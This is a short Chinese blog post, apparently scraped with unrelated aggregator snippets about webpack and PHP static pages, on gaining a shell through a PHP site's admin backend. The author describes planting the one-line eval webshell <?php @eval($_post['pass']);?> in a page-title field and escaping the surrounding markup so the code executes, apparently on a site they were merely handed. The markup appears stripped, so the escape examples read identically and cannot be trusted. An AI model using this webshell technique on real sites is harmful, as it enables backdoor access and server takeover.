後台單獨生成php頁面拿shell及防範

2022-09-23 22:45:18 字數 557 閱讀 9941

今天群裡乙個鳥人丟個後台叫幫忙拿shell。一看是fck,就各種去弄了...結果無功而返,php語言。過程就不說了,不是重點.後來在前台開啟各種鏈結以及配合後台檢視發現他的關於我們\招賢納士只能的頁面是獨立的php頁面.這就好辦了。寫個一句話即可。至於怎麼寫,我這就扯下。

看**:

業務領域

標題標題2

內容內容 內容

內容      

這是他後台能夠控制的部分,可以看到,標題和內容都被放在乙個div裡面

就拿標題部分來說吧

標題 直接寫入一句話 將會變成

<?php @eval($_post['pass']);?>

這樣是不能執行成功的,我們要做的,僅僅只是加多一點**而已,說白了就是想辦法脫離這個和的控制。

比如我們把標題寫成

<?php @eval($_post['pass']);?>

這樣輸出結果就變成

<?php @eval($_post['pass']);?>

這樣就可以成功執行我們的**了.但是今天這個後台標題限制了字數,內容編輯器也被那貨搞壞了。就沒成功,只能寫

webpack單獨生成chunk的方法

這裡記錄一下我所知道的可以生成chunk的方法 1.多入口 多入口 有乙個入口,最終輸出就有乙個bundle entry 2.optimization 可以將node modules中 單獨打包成乙個chunk最終輸出 自動分析多入口chunk中,有沒有公共的檔案。如果有,就會把公共的檔案打包成乙個...

關於後台生成單獨頁面拿shell

今天群裡乙個鳥人丟個後台叫幫忙拿shell。一看是fck,就各種去弄了.結果無功而返,php語言。過程就不說了,不是重點.後來在前台開啟各種鏈結以及配合後台檢視發現他的關於我們 招賢納士只能的頁面是獨立的php頁面.這就好辦了。寫個一句話即可。至於怎麼寫,我這就扯下。看 業務領域 標題標題2 內容內...

PHP生成靜態頁面

php生成靜態頁面 php生成靜態頁面的條件 使用ob start 方法開啟快取區也是生成靜態頁面的開始 使用ob get contect 方法獲取快取內容 使用ob clean 方法清空快取 ob start 開啟快取區 filename date ymdhis rand 1000,9999 ht...